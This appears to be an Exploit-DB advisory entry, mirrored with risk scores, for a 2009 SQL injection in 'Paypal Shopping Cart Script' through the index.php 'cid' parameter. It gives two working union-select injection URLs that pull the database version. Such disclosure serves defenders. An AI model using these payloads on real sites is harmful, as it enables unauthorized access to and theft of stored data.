Lucene search

K
exploitdb599eme ManEDB-ID:34711
HistoryAug 21, 2009 - 12:00 a.m.

Paypal Shopping Cart Script - 'index.php?cid' SQL Injection

2009-08-2100:00:00
599eme Man
www.exploit-db.com
25

AI Score

7.4

Confidence

Low

EPSS

0.001

Percentile

33.9%

source: https://www.securityfocus.com/bid/43471/info
 
Paypal Shopping Cart Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
http://www.example.com/paypalshopping/index.php?cid=7%20union%20all%20select%201,2,3,version(),5,6,7--

http://www.example.com/paypalshopping/index.php?cid=1%20AND%201=null+union+select+1,2,3,version(),5,6,7--

AI Score

7.4

Confidence

Low

EPSS

0.001

Percentile

33.9%

Related for EDB-ID:34711